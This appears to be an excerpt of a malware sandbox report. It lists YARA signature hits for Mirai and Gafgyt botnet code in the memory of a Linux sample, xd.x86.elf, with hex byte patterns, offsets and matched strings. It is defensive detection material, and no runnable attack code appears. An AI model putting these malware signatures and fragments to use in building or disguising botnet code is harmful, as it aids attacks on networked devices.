6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10a04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10a90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10aa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ab8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10acc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ae0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10af4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10b94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x109b4:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6246.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x4f30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_93fc3657	unknown	unknown	0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_804f8e7c	unknown	unknown	0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_99d78950	unknown	unknown	0xfc1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x10a1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1176:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x1421:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 0x18a3:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_aa39fb02	unknown	unknown	0xb840:$a: 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_a68e498c	unknown	unknown	0x2b3:$a: 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xaf22:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x22b2:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xeab4:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xd479:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xaef2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6242.1.0000000008048000.000000000805b000.r-x.sdmp	Mirai_Botnet_Malware	Detects Mirai Botnet Malware	Florian Roth	0x106a0:$x1: POST /cdn-cgi/ 0x11387:$s1: LCOGQGPTGP
Process Memory Space: xd.x86.elf PID: 6239	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6239	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6239	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0xc19:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc2d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc41:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc55:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc69:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc7d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc91:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xca5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xcb9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xccd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xce1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xcf5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd09:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd1d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd31:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd45:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd59:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd6d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd81:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xd95:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xda9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6239	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0xbcc:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: xd.x86.elf PID: 6241	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6241	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6241	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x13ee:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1402:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1416:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x142a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x143e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1452:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1466:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x147a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x148e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14a2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14b6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14ca:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14de:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14f2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1506:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x151a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x152e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1542:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1556:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x156a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6241	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x13a1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: xd.x86.elf PID: 6242	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6242	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6242	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10cf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10f7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x110b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x111f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1133:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1147:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x115b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x116f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1183:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1197:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11ab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11bf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11fb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x120f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1223:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1237:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x124b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x125f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6242	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x1082:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: xd.x86.elf PID: 6243	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6243	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6243	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1408:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x141c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1430:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1444:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1458:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x146c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1480:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1494:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x150c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1520:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1534:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1548:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x155c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1570:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1584:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1598:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6243	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x13bb:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: xd.x86.elf PID: 6246	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6246	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: xd.x86.elf PID: 6246	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x876:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x88a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x89e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x8b2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x8c6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x8da:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x8ee:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x902:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x916:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x92a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x93e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x952:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x966:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x97a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x98e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x9a2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x9b6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x9ca:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x9de:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x9f2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xa06:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: xd.x86.elf PID: 6246	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x829:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: xd.x86.elf PID: 6247	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
